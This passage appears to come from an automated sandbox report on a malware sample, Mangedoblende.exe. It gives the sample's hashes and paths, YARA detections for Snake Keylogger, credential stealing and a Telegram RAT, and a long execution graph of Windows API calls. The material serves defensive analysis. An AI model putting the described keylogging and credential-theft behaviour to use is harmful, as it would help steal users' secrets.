                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:13:16:39
                                                                                                                                                                          Start date:10/01/2025
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:13:17:17
                                                                                                                                                                          Start date:10/01/2025
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:1'119'496 bytes
                                                                                                                                                                          MD5 hash:487FAD16DA392C87FB894A6CCBD95870
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 63%, ReversingLabs
                                                                                                                                                                          • Detection: 76%, Virustotal, Browse
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:21.9%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:17%
                                                                                                                                                                            Total number of Nodes:1383
                                                                                                                                                                            Total number of Limit Nodes:33
                                                                                                                                                                            execution_graph 3209 401941 3210 401943 3209->3210 3215 402da6 3210->3215 3216 402db2 3215->3216 3261 406544 3216->3261 3219 401948 3221 405c13 3219->3221 3303 405ede 3221->3303 3224 405c52 3227 405d7d 3224->3227 3317 406507 lstrcpynW 3224->3317 3225 405c3b DeleteFileW 3226 401951 3225->3226 3227->3226 3346 40683d FindFirstFileW 3227->3346 3229 405c78 3230 405c8b 3229->3230 3231 405c7e lstrcatW 3229->3231 3318 405e22 lstrlenW 3230->3318 3232 405c91 3231->3232 3235 405ca1 lstrcatW 3232->3235 3236 405c97 3232->3236 3238 405cac lstrlenW FindFirstFileW 3235->3238 3236->3235 3236->3238 3241 405d72 3238->3241 3259 405cce 3238->3259 3239 405d9b 3349 405dd6 lstrlenW CharPrevW 3239->3349 3241->3227 3244 405d55 FindNextFileW 3247 405d6b FindClose 3244->3247 3244->3259 3245 405bcb 5 API calls 3246 405dad 3245->3246 3248 405db1 3246->3248 3249 405dc7 3246->3249 3247->3241 3248->3226 3252 405569 24 API calls 3248->3252 3251 405569 24 API calls 3249->3251 3251->3226 3254 405dbe 3252->3254 3253 405c13 60 API calls 3253->3259 3256 4062c7 36 API calls 3254->3256 3255 405569 24 API calls 3255->3244 3257 405dc5 3256->3257 3257->3226 3259->3244 3259->3253 3259->3255 3322 406507 lstrcpynW 3259->3322 3323 405bcb 3259->3323 3331 405569 3259->3331 3342 4062c7 MoveFileExW 3259->3342 3262 406551 3261->3262 3263 406774 3262->3263 3266 406742 lstrlenW 3262->3266 3267 406659 GetSystemDirectoryW 3262->3267 3271 406544 10 API calls 3262->3271 3272 40666c GetWindowsDirectoryW 3262->3272 3273 4066e3 lstrcatW 3262->3273 3274 406544 10 API calls 3262->3274 3275 40678e 5 API calls 3262->3275 3276 40669b SHGetSpecialFolderLocation 3262->3276 3287 4063d5 3262->3287 3292 40644e wsprintfW 3262->3292 3293 406507 lstrcpynW 3262->3293 3264 402dd3 3263->3264 3294 406507 lstrcpynW 3263->3294 3264->3219 3278 40678e 3264->3278 3266->3262 3267->3262 3271->3266 3272->3262 3273->3262 3274->3262 3275->3262 3276->3262 3277 4066b3 SHGetPathFromIDListW CoTaskMemFree 3276->3277 3277->3262 3279 40679b 3278->3279 3281 406804 CharNextW 3279->3281 3282 406811 3279->3282 3285 4067f0 CharNextW 3279->3285 3286 4067ff CharNextW 3279->3286 3299 405e03 3279->3299 3280 406816 CharPrevW 3280->3282 3281->3279 3281->3282 3282->3280 3283 406837 3282->3283 3283->3219 3285->3279 3286->3281 3295 406374 3287->3295 3290 406439 3290->3262 3291 406409 RegQueryValueExW RegCloseKey 3291->3290 3292->3262 3293->3262 3294->3264 3296 406383 3295->3296 3297 406387 3296->3297 3298 40638c RegOpenKeyExW 3296->3298 3297->3290 3297->3291 3298->3297 3300 405e09 3299->3300 3301 405e1f 3300->3301 3302 405e10 CharNextW 3300->3302 3301->3279 3302->3300 3352 406507 lstrcpynW 3303->3352 3305 405eef 3353 405e81 CharNextW CharNextW 3305->3353 3308 405c33 3308->3224 3308->3225 3309 40678e 5 API calls 3315 405f05 3309->3315 3310 405f36 lstrlenW 3311 405f41 3310->3311 3310->3315 3313 405dd6 3 API calls 3311->3313 3312 40683d 2 API calls 3312->3315 3314 405f46 GetFileAttributesW 3313->3314 3314->3308 3315->3308 3315->3310 3315->3312 3316 405e22 2 API calls 3315->3316 3316->3310 3317->3229 3319 405e30 3318->3319 3320 405e42 3319->3320 3321 405e36 CharPrevW 3319->3321 3320->3232 3321->3319 3321->3320 3322->3259 3359 405fd2 GetFileAttributesW 3323->3359 3326 405bf8 3326->3259 3327 405be6 RemoveDirectoryW 3329 405bf4 3327->3329 3328 405bee DeleteFileW 3328->3329 3329->3326 3330 405c04 SetFileAttributesW 3329->3330 3330->3326 3332 405584 3331->3332 3333 405626 3331->3333 3334 4055a0 lstrlenW 3332->3334 3335 406544 17 API calls 3332->3335 3333->3259 3336 4055c9 3334->3336 3337 4055ae lstrlenW 3334->3337 3335->3334 3339 4055dc 3336->3339 3340 4055cf SetWindowTextW 3336->3340 3337->3333 3338 4055c0 lstrcatW 3337->3338 3338->3336 3339->3333 3341 4055e2 SendMessageW SendMessageW SendMessageW 3339->3341 3340->3339 3341->3333 3343 4062e8 3342->3343 3344 4062db 3342->3344 3343->3259 3362 40614d 3344->3362 3347 406853 FindClose 3346->3347 3348 405d97 3346->3348 3347->3348 3348->3226 3348->3239 3350 405df2 lstrcatW 3349->3350 3351 405da1 3349->3351 3350->3351 3351->3245 3352->3305 3354 405e9e 3353->3354 3357 405eb0 3353->3357 3356 405eab CharNextW 3354->3356 3354->3357 3355 405ed4 3355->3308 3355->3309 3356->3355 3357->3355 3358 405e03 CharNextW 3357->3358 3358->3357 3360 405bd7 3359->3360 3361 405fe4 SetFileAttributesW 3359->3361 3360->3326 3360->3327 3360->3328 3361->3360 3363 4061a3 GetShortPathNameW 3362->3363 3364 40617d 3362->3364 3366 4062c2 3363->3366 3367 4061b8 3363->3367 3389 405ff7 GetFileAttributesW CreateFileW 3364->3389 3366->3343 3367->3366 3369 4061c0 wsprintfA 3367->3369 3368 406187 CloseHandle GetShortPathNameW 3368->3366 3370 40619b 3368->3370 3371 406544 17 API calls 3369->3371 3370->3363 3370->3366 3372 4061e8 3371->3372 3390 405ff7 GetFileAttributesW CreateFileW 3372->3390 3374 4061f5 3374->3366 3375 406204 GetFileSize GlobalAlloc 3374->3375 3376 406226 3375->3376 3377 4062bb CloseHandle 3375->3377 3391 40607a ReadFile 3376->3391 3377->3366 3382 406245 lstrcpyA 3387 406267 3382->3387 3383 406259 3384 405f5c 4 API calls 3383->3384 3384->3387 3385 40629e SetFilePointer 3398 4060a9 WriteFile 3385->3398 3387->3385 3389->3368 3390->3374 3392 406098 3391->3392 3392->3377 3393 405f5c lstrlenA 3392->3393 3394 405f9d lstrlenA 3393->3394 3395 405fa5 3394->3395 3396 405f76 lstrcmpiA 3394->3396 3395->3382 3395->3383 3396->3395 3397 405f94 CharNextA 3396->3397 3397->3394 3399 4060c7 GlobalFree 3398->3399 3399->3377 3400 4015c1 3401 402da6 17 API calls 3400->3401 3402 4015c8 3401->3402 3403 405e81 4 API calls 3402->3403 3415 4015d1 3403->3415 3404 401631 3406 401663 3404->3406 3407 401636 3404->3407 3405 405e03 CharNextW 3405->3415 3409 401423 24 API calls 3406->3409 3427 401423 3407->3427 3416 40165b 3409->3416 3414 40164a SetCurrentDirectoryW 3414->3416 3415->3404 3415->3405 3417 401617 GetFileAttributesW 3415->3417 3419 405ad2 3415->3419 3422 405a38 CreateDirectoryW 3415->3422 3431 405ab5 CreateDirectoryW 3415->3431 3417->3415 3434 4068d4 GetModuleHandleA 3419->3434 3423 405a85 3422->3423 3424 405a89 GetLastError 3422->3424 3423->3415 3424->3423 3425 405a98 SetFileSecurityW 3424->3425 3425->3423 3426 405aae GetLastError 3425->3426 3426->3423 3428 405569 24 API calls 3427->3428 3429 401431 3428->3429 3430 406507 lstrcpynW 3429->3430 3430->3414 3432 405ac5 3431->3432 3433 405ac9 GetLastError 3431->3433 3432->3415 3433->3432 3435 4068f0 3434->3435 3436 4068fa GetProcAddress 3434->3436 3440 406864 GetSystemDirectoryW 3435->3440 3438 405ad9 3436->3438 3438->3415 3439 4068f6 3439->3436 3439->3438 3441 406886 wsprintfW LoadLibraryExW 3440->3441 3441->3439 4044 401c43 4045 402d84 17 API calls 4044->4045 4046 401c4a 4045->4046 4047 402d84 17 API calls 4046->4047 4048 401c57 4047->4048 4049 401c6c 4048->4049 4050 402da6 17 API calls 4048->4050 4051 402da6 17 API calls 4049->4051 4055 401c7c 4049->4055 4050->4049 4051->4055 4052 401cd3 4054 402da6 17 API calls 4052->4054 4053 401c87 4056 402d84 17 API calls 4053->4056 4057 401cd8 4054->4057 4055->4052 4055->4053 4058 401c8c 4056->4058 4060 402da6 17 API calls 4057->4060 4059 402d84 17 API calls 4058->4059 4061 401c98 4059->4061 4062 401ce1 FindWindowExW 4060->4062 4063 401cc3 SendMessageW 4061->4063 4064 401ca5 SendMessageTimeoutW 4061->4064 4065 401d03 4062->4065 4063->4065 4064->4065 4066 4028c4 4067 4028ca 4066->4067 4068 4028d2 FindClose 4067->4068 4069 402c2a 4067->4069 4068->4069 4080 4016cc 4081 402da6 17 API calls 4080->4081 4082 4016d2 GetFullPathNameW 4081->4082 4083 4016ec 4082->4083 4089 40170e 4082->4089 4085 40683d 2 API calls 4083->4085 4083->4089 4084 401723 GetShortPathNameW 4086 402c2a 4084->4086 4087 4016fe 4085->4087 4087->4089 4090 406507 lstrcpynW 4087->4090 4089->4084 4089->4086 4090->4089 4091 401e4e GetDC 4092 402d84 17 API calls 4091->4092 4093 401e60 GetDeviceCaps MulDiv ReleaseDC 4092->4093 4094 402d84 17 API calls 4093->4094 4095 401e91 4094->4095 4096 406544 17 API calls 4095->4096 4097 401ece CreateFontIndirectW 4096->4097 4098 402638 4097->4098 4099 402950 4100 402da6 17 API calls 4099->4100 4101 40295c 4100->4101 4102 402972 4101->4102 4103 402da6 17 API calls 4101->4103 4104 405fd2 2 API calls 4102->4104 4103->4102 4105 402978 4104->4105 4127 405ff7 GetFileAttributesW CreateFileW 4105->4127 4107 402985 4108 402a3b 4107->4108 4109 4029a0 GlobalAlloc 4107->4109 4110 402a23 4107->4110 4111 402a42 DeleteFileW 4108->4111 4112 402a55 4108->4112 4109->4110 4113 4029b9 4109->4113 4114 4032b4 35 API calls 4110->4114 4111->4112 4128 4034af SetFilePointer 4113->4128 4116 402a30 CloseHandle 4114->4116 4116->4108 4117 4029bf 4118 403499 ReadFile 4117->4118 4119 4029c8 GlobalAlloc 4118->4119 4120 4029d8 4119->4120 4121 402a0c 4119->4121 4123 4032b4 35 API calls 4120->4123 4122 4060a9 WriteFile 4121->4122 4124 402a18 GlobalFree 4122->4124 4126 4029e5 4123->4126 4124->4110 4125 402a03 GlobalFree 4125->4121 4126->4125 4127->4107 4128->4117 4129 404ed0 GetDlgItem GetDlgItem 4130 404f22 7 API calls 4129->4130 4138 405147 4129->4138 4131 404fc9 DeleteObject 4130->4131 4132 404fbc SendMessageW 4130->4132 4133 404fd2 4131->4133 4132->4131 4134 405009 4133->4134 4139 406544 17 API calls 4133->4139 4136 404463 18 API calls 4134->4136 4135 405229 4137 4052d5 4135->4137 4146 405282 SendMessageW 4135->4146 4172 40513a 4135->4172 4140 40501d 4136->4140 4141 4052e7 4137->4141 4142 4052df SendMessageW 4137->4142 4138->4135 4157 4051b6 4138->4157 4183 404e1e SendMessageW 4138->4183 4143 404feb SendMessageW SendMessageW 4139->4143 4145 404463 18 API calls 4140->4145 4149 405300 4141->4149 4150 4052f9 ImageList_Destroy 4141->4150 4158 405310 4141->4158 4142->4141 4143->4133 4163 40502e 4145->4163 4152 405297 SendMessageW 4146->4152 4146->4172 4147 40521b SendMessageW 4147->4135 4148 4044ca 8 API calls 4153 4054d6 4148->4153 4154 405309 GlobalFree 4149->4154 4149->4158 4150->4149 4151 40548a 4159 40549c ShowWindow GetDlgItem ShowWindow 4151->4159 4151->4172 4156 4052aa 4152->4156 4154->4158 4155 405109 GetWindowLongW SetWindowLongW 4160 405122 4155->4160 4167 4052bb SendMessageW 4156->4167 4157->4135 4157->4147 4158->4151 4174 40534b 4158->4174 4188 404e9e 4158->4188 4159->4172 4161 405127 ShowWindow 4160->4161 4162 40513f 4160->4162 4181 404498 SendMessageW 4161->4181 4182 404498 SendMessageW 4162->4182 4163->4155 4166 405081 SendMessageW 4163->4166 4168 405104 4163->4168 4169 4050d3 SendMessageW 4163->4169 4170 4050bf SendMessageW 4163->4170 4166->4163 4167->4137 4168->4155 4168->4160 4169->4163 4170->4163 4172->4148 4173 405455 4175 405460 InvalidateRect 4173->4175 4177 40546c 4173->4177 4176 405379 SendMessageW 4174->4176 4178 40538f 4174->4178 4175->4177 4176->4178 4177->4151 4197 404dd9 4177->4197 4178->4173 4179 405403 SendMessageW SendMessageW 4178->4179 4179->4178 4181->4172 4182->4138 4184 404e41 GetMessagePos ScreenToClient SendMessageW 4183->4184 4185 404e7d SendMessageW 4183->4185 4186 404e75 4184->4186 4187 404e7a 4184->4187 4185->4186 4186->4157 4187->4185 4200 406507 lstrcpynW 4188->4200 4190 404eb1 4201 40644e wsprintfW 4190->4201 4192 404ebb 4193 40140b 2 API calls 4192->4193 4194 404ec4 4193->4194 4202 406507 lstrcpynW 4194->4202 4196 404ecb 4196->4174 4203 404d10 4197->4203 4199 404dee 4199->4151 4200->4190 4201->4192 4202->4196 4204 404d29 4203->4204 4205 406544 17 API calls 4204->4205 4206 404d8d 4205->4206 4207 406544 17 API calls 4206->4207 4208 404d98 4207->4208 4209 406544 17 API calls 4208->4209 4210 404dae lstrlenW wsprintfW SetDlgItemTextW 4209->4210 4210->4199 4211 4045d3 lstrlenW 4212 4045f2 4211->4212 4213 4045f4 WideCharToMultiByte 4211->4213 4212->4213 4214 404954 4215 404980 4214->4215 4216 404991 4214->4216 4275 405b4b GetDlgItemTextW 4215->4275 4218 40499d GetDlgItem 4216->4218 4224 4049fc 4216->4224 4219 4049b1 4218->4219 4223 4049c5 SetWindowTextW 4219->4223 4227 405e81 4 API calls 4219->4227 4220 404ae0 4273 404c8f 4220->4273 4277 405b4b GetDlgItemTextW 4220->4277 4221 40498b 4222 40678e 5 API calls 4221->4222 4222->4216 4228 404463 18 API calls 4223->4228 4224->4220 4229 406544 17 API calls 4224->4229 4224->4273 4226 4044ca 8 API calls 4231 404ca3 4226->4231 4232 4049bb 4227->4232 4233 4049e1 4228->4233 4234 404a70 SHBrowseForFolderW 4229->4234 4230 404b10 4235 405ede 18 API calls 4230->4235 4232->4223 4239 405dd6 3 API calls 4232->4239 4236 404463 18 API calls 4233->4236 4234->4220 4237 404a88 CoTaskMemFree 4234->4237 4238 404b16 4235->4238 4240 4049ef 4236->4240 4241 405dd6 3 API calls 4237->4241 4278 406507 lstrcpynW 4238->4278 4239->4223 4276 404498 SendMessageW 4240->4276 4243 404a95 4241->4243 4246 404acc SetDlgItemTextW 4243->4246 4250 406544 17 API calls 4243->4250 4245 4049f5 4248 4068d4 5 API calls 4245->4248 4246->4220 4247 404b2d 4249 4068d4 5 API calls 4247->4249 4248->4224 4256 404b34 4249->4256 4251 404ab4 lstrcmpiW 4250->4251 4251->4246 4253 404ac5 lstrcatW 4251->4253 4252 404b75 4279 406507 lstrcpynW 4252->4279 4253->4246 4255 404b7c 4257 405e81 4 API calls 4255->4257 4256->4252 4261 405e22 2 API calls 4256->4261 4262 404bcd 4256->4262 4258 404b82 GetDiskFreeSpaceW 4257->4258 4260 404ba6 MulDiv 4258->4260 4258->4262 4260->4262 4261->4256 4264 404dd9 20 API calls 4262->4264 4272 404c3e 4262->4272 4263 404c61 4280 404485 KiUserCallbackDispatcher 4263->4280 4266 404c2b 4264->4266 4265 40140b 2 API calls 4265->4263 4268 404c40 SetDlgItemTextW 4266->4268 4269 404c30 4266->4269 4268->4272 4270 404d10 20 API calls 4269->4270 4270->4272 4271 404c7d 4271->4273 4281 4048ad 4271->4281 4272->4263 4272->4265 4273->4226 4275->4221 4276->4245 4277->4230 4278->4247 4279->4255 4280->4271 4282 4048c0 SendMessageW 4281->4282 4283 4048bb 4281->4283 4282->4273 4283->4282 4284 401956 4285 402da6 17 API calls 4284->4285 4286 40195d lstrlenW 4285->4286 4287 402638 4286->4287 4288 4014d7 4289 402d84 17 API calls 4288->4289 4290 4014dd Sleep 4289->4290 4292 402c2a 4290->4292 3988 4020d8 3989 40219c 3988->3989 3990 4020ea 3988->3990 3992 401423 24 API calls 3989->3992 3991 402da6 17 API calls 3990->3991 3993 4020f1 3991->3993 3999 4022f6 3992->3999 3994 402da6 17 API calls 3993->3994 3995 4020fa 3994->3995 3996 402110 LoadLibraryExW 3995->3996 3997 402102 GetModuleHandleW 3995->3997 3996->3989 3998 402121 3996->3998 3997->3996 3997->3998 4008 406943 3998->4008 4002 402132 4005 401423 24 API calls 4002->4005 4006 402142 4002->4006 4003 40216b 4004 405569 24 API calls 4003->4004 4004->4006 4005->4006 4006->3999 4007 40218e FreeLibrary 4006->4007 4007->3999 4013 406529 WideCharToMultiByte 4008->4013 4010 406960 4011 406967 GetProcAddress 4010->4011 4012 40212c 4010->4012 4011->4012 4012->4002 4012->4003 4013->4010 4293 402b59 4294 402b60 4293->4294 4295 402bab 4293->4295 4298 402d84 17 API calls 4294->4298 4301 402ba9 4294->4301 4296 4068d4 5 API calls 4295->4296 4297 402bb2 4296->4297 4299 402da6 17 API calls 4297->4299 4300 402b6e 4298->4300 4302 402bbb 4299->4302 4303 402d84 17 API calls 4300->4303 4302->4301 4304 402bbf IIDFromString 4302->4304 4306 402b7a 4303->4306 4304->4301 4305 402bce 4304->4305 4305->4301 4311 406507 lstrcpynW 4305->4311 4310 40644e wsprintfW 4306->4310 4308 402beb CoTaskMemFree 4308->4301 4310->4301 4311->4308 4312 402a5b 4313 402d84 17 API calls 4312->4313 4314 402a61 4313->4314 4315 402aa4 4314->4315 4316 402a88 4314->4316 4324 40292e 4314->4324 4318 402abe 4315->4318 4319 402aae 4315->4319 4317 402a8d 4316->4317 4320 402a9e 4316->4320 4326 406507 lstrcpynW 4317->4326 4322 406544 17 API calls 4318->4322 4321 402d84 17 API calls 4319->4321 4320->4324 4327 40644e wsprintfW 4320->4327 4321->4320 4322->4320 4326->4324 4327->4324 4014 40175c 4015 402da6 17 API calls 4014->4015 4016 401763 4015->4016 4017 406026 2 API calls 4016->4017 4018 40176a 4017->4018 4019 406026 2 API calls 4018->4019 4019->4018 4328 401d5d 4329 402d84 17 API calls 4328->4329 4330 401d6e SetWindowLongW 4329->4330 4331 402c2a 4330->4331 4332 4054dd 4333 405501 4332->4333 4334 4054ed 4332->4334 4337 405509 IsWindowVisible 4333->4337 4343 405520 4333->4343 4335 4054f3 4334->4335 4336 40554a 4334->4336 4338 4044af SendMessageW 4335->4338 4340 40554f CallWindowProcW 4336->4340 4337->4336 4339 405516 4337->4339 4341 4054fd 4338->4341 4342 404e1e 5 API calls 4339->4342 4340->4341 4342->4343 4343->4340 4344 404e9e 4 API calls 4343->4344 4344->4336 4020 401ede 4021 402d84 17 API calls 4020->4021 4022 401ee4 4021->4022 4023 402d84 17 API calls 4022->4023 4024 401ef0 4023->4024 4025 401f07 EnableWindow 4024->4025 4026 401efc ShowWindow 4024->4026 4027 402c2a 4025->4027 4026->4027 4345 4028de 4346 4028e6 4345->4346 4347 4028ea FindNextFileW 4346->4347 4349 4028fc 4346->4349 4348 402943 4347->4348 4347->4349 4351 406507 lstrcpynW 4348->4351 4351->4349 4359 401563 4360 402ba4 4359->4360 4363 40644e wsprintfW 4360->4363 4362 402ba9 4363->4362 3447 403f64 3448 403f7c 3447->3448 3449 4040dd 3447->3449 3448->3449 3452 403f88 3448->3452 3450 40412e 3449->3450 3451 4040ee GetDlgItem GetDlgItem 3449->3451 3454 404188 3450->3454 3466 401389 2 API calls 3450->3466 3453 404463 18 API calls 3451->3453 3455 403f93 SetWindowPos 3452->3455 3456 403fa6 3452->3456 3457 404118 SetClassLongW 3453->3457 3467 4040d8 3454->3467 3520 4044af 3454->3520 3455->3456 3459 403ff1 3456->3459 3460 403faf ShowWindow 3456->3460 3463 40140b 2 API calls 3457->3463 3464 404010 3459->3464 3465 403ff9 DestroyWindow 3459->3465 3461 4040ca 3460->3461 3462 403fcf GetWindowLongW 3460->3462 3542 4044ca 3461->3542 3462->3461 3468 403fe8 ShowWindow 3462->3468 3463->3450 3470 404015 SetWindowLongW 3464->3470 3471 404026 3464->3471 3469 4043ec 3465->3469 3472 404160 3466->3472 3468->3459 3469->3467 3478 40441d ShowWindow 3469->3478 3470->3467 3471->3461 3476 404032 GetDlgItem 3471->3476 3472->3454 3477 404164 SendMessageW 3472->3477 3474 40140b 2 API calls 3489 40419a 3474->3489 3475 4043ee DestroyWindow EndDialog 3475->3469 3479 404060 3476->3479 3480 404043 SendMessageW IsWindowEnabled 3476->3480 3477->3467 3478->3467 3482 40406d 3479->3482 3484 4040b4 SendMessageW 3479->3484 3485 404080 3479->3485 3493 404065 3479->3493 3480->3467 3480->3479 3481 406544 17 API calls 3481->3489 3482->3484 3482->3493 3484->3461 3486 404088 3485->3486 3487 40409d 3485->3487 3536 40140b 3486->3536 3491 40140b 2 API calls 3487->3491 3488 40409b 3488->3461 3489->3467 3489->3474 3489->3475 3489->3481 3492 404463 18 API calls 3489->3492 3511 40432e DestroyWindow 3489->3511 3523 404463 3489->3523 3494 4040a4 3491->3494 3492->3489 3539 40443c 3493->3539 3494->3461 3494->3493 3496 404215 GetDlgItem 3497 404232 ShowWindow KiUserCallbackDispatcher 3496->3497 3498 40422a 3496->3498 3526 404485 KiUserCallbackDispatcher 3497->3526 3498->3497 3500 40425c EnableWindow 3505 404270 3500->3505 3501 404275 GetSystemMenu EnableMenuItem SendMessageW 3502 4042a5 SendMessageW 3501->3502 3501->3505 3502->3505 3505->3501 3527 404498 SendMessageW 3505->3527 3528 403f45 3505->3528 3531 406507 lstrcpynW 3505->3531 3507 4042d4 lstrlenW 3508 406544 17 API calls 3507->3508 3509 4042ea SetWindowTextW 3508->3509 3532 401389 3509->3532 3511->3469 3512 404348 CreateDialogParamW 3511->3512 3512->3469 3513 40437b 3512->3513 3514 404463 18 API calls 3513->3514 3515 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3514->3515 3516 401389 2 API calls 3515->3516 3517 4043cc 3516->3517 3517->3467 3518 4043d4 ShowWindow 3517->3518 3519 4044af SendMessageW 3518->3519 3519->3469 3521 4044c7 3520->3521 3522 4044b8 SendMessageW 3520->3522 3521->3489 3522->3521 3524 406544 17 API calls 3523->3524 3525 40446e SetDlgItemTextW 3524->3525 3525->3496 3526->3500 3527->3505 3529 406544 17 API calls 3528->3529 3530 403f53 SetWindowTextW 3529->3530 3530->3505 3531->3507 3534 401390 3532->3534 3533 4013fe 3533->3489 3534->3533 3535 4013cb MulDiv SendMessageW 3534->3535 3535->3534 3537 401389 2 API calls 3536->3537 3538 401420 3537->3538 3538->3493 3540 404443 3539->3540 3541 404449 SendMessageW 3539->3541 3540->3541 3541->3488 3543 4044e2 GetWindowLongW 3542->3543 3544 40458d 3542->3544 3543->3544 3545 4044f7 3543->3545 3544->3467 3545->3544 3546 404524 GetSysColor 3545->3546 3547 404527 3545->3547 3546->3547 3548 404537 SetBkMode 3547->3548 3549 40452d SetTextColor 3547->3549 3550 404555 3548->3550 3551 40454f GetSysColor 3548->3551 3549->3548 3552 404566 3550->3552 3553 40455c SetBkColor 3550->3553 3551->3550 3552->3544 3554 404580 CreateBrushIndirect 3552->3554 3555 404579 DeleteObject 3552->3555 3553->3552 3554->3544 3555->3554 4364 401968 4365 402d84 17 API calls 4364->4365 4366 40196f 4365->4366 4367 402d84 17 API calls 4366->4367 4368 40197c 4367->4368 4369 402da6 17 API calls 4368->4369 4370 401993 lstrlenW 4369->4370 4371 4019a4 4370->4371 4372 4019e5 4371->4372 4376 406507 lstrcpynW 4371->4376 4374 4019d5 4374->4372 4375 4019da lstrlenW 4374->4375 4375->4372 4376->4374 4377 40166a 4378 402da6 17 API calls 4377->4378 4379 401670 4378->4379 4380 40683d 2 API calls 4379->4380 4381 401676 4380->4381 4382 402aeb 4383 402d84 17 API calls 4382->4383 4384 402af1 4383->4384 4385 406544 17 API calls 4384->4385 4386 40292e 4384->4386 4385->4386 4387 4026ec 4388 402d84 17 API calls 4387->4388 4389 4026fb 4388->4389 4390 402745 ReadFile 4389->4390 4391 40607a ReadFile 4389->4391 4392 402785 MultiByteToWideChar 4389->4392 4393 40283a 4389->4393 4396 4027ab SetFilePointer MultiByteToWideChar 4389->4396 4397 40284b 4389->4397 4399 402838 4389->4399 4400 4060d8 SetFilePointer 4389->4400 4390->4389 4390->4399 4391->4389 4392->4389 4409 40644e wsprintfW 4393->4409 4396->4389 4398 40286c SetFilePointer 4397->4398 4397->4399 4398->4399 4401 4060f4 4400->4401 4402 40610c 4400->4402 4403 40607a ReadFile 4401->4403 4402->4389 4404 406100 4403->4404 4404->4402 4405 406115 SetFilePointer 4404->4405 4406 40613d SetFilePointer 4404->4406 4405->4406 4407 406120 4405->4407 4406->4402 4408 4060a9 WriteFile 4407->4408 4408->4402 4409->4399 3699 40176f 3700 402da6 17 API calls 3699->3700 3701 401776 3700->3701 3702 401796 3701->3702 3703 40179e 3701->3703 3738 406507 lstrcpynW 3702->3738 3739 406507 lstrcpynW 3703->3739 3706 40179c 3710 40678e 5 API calls 3706->3710 3707 4017a9 3708 405dd6 3 API calls 3707->3708 3709 4017af lstrcatW 3708->3709 3709->3706 3714 4017bb 3710->3714 3711 40683d 2 API calls 3711->3714 3712 405fd2 2 API calls 3712->3714 3714->3711 3714->3712 3715 4017cd CompareFileTime 3714->3715 3716 40188d 3714->3716 3722 406507 lstrcpynW 3714->3722 3725 406544 17 API calls 3714->3725 3734 401864 3714->3734 3737 405ff7 GetFileAttributesW CreateFileW 3714->3737 3740 405b67 3714->3740 3715->3714 3717 405569 24 API calls 3716->3717 3719 401897 3717->3719 3718 405569 24 API calls 3736 401879 3718->3736 3720 4032b4 35 API calls 3719->3720 3721 4018aa 3720->3721 3723 4018be SetFileTime 3721->3723 3724 4018d0 CloseHandle 3721->3724 3722->3714 3723->3724 3726 4018e1 3724->3726 3724->3736 3725->3714 3727 4018e6 3726->3727 3728 4018f9 3726->3728 3729 406544 17 API calls 3727->3729 3730 406544 17 API calls 3728->3730 3732 4018ee lstrcatW 3729->3732 3733 401901 3730->3733 3732->3733 3735 405b67 MessageBoxIndirectW 3733->3735 3734->3718 3734->3736 3735->3736 3737->3714 3738->3706 3739->3707 3741 405b7c 3740->3741 3742 405bc8 3741->3742 3743 405b90 MessageBoxIndirectW 3741->3743 3742->3714 3743->3742 4417 401a72 4418 402d84 17 API calls 4417->4418 4419 401a7b 4418->4419 4420 402d84 17 API calls 4419->4420 4421 401a20 4420->4421 4422 401573 4423 401583 ShowWindow 4422->4423 4424 40158c 4422->4424 4423->4424 4425 40159a ShowWindow 4424->4425 4426 402c2a 4424->4426 4425->4426 4427 403b74 4428 403b7f 4427->4428 4429 403b86 GlobalAlloc 4428->4429 4430 403b83 4428->4430 4429->4430 4431 4023f4 4432 402da6 17 API calls 4431->4432 4433 402403 4432->4433 4434 402da6 17 API calls 4433->4434 4435 40240c 4434->4435 4436 402da6 17 API calls 4435->4436 4437 402416 GetPrivateProfileStringW 4436->4437 4438 4014f5 SetForegroundWindow 4439 402c2a 4438->4439 4440 401ff6 4441 402da6 17 API calls 4440->4441 4442 401ffd 4441->4442 4443 40683d 2 API calls 4442->4443 4444 402003 4443->4444 4446 402014 4444->4446 4447 40644e wsprintfW 4444->4447 4447->4446 3754 4034f7 SetErrorMode 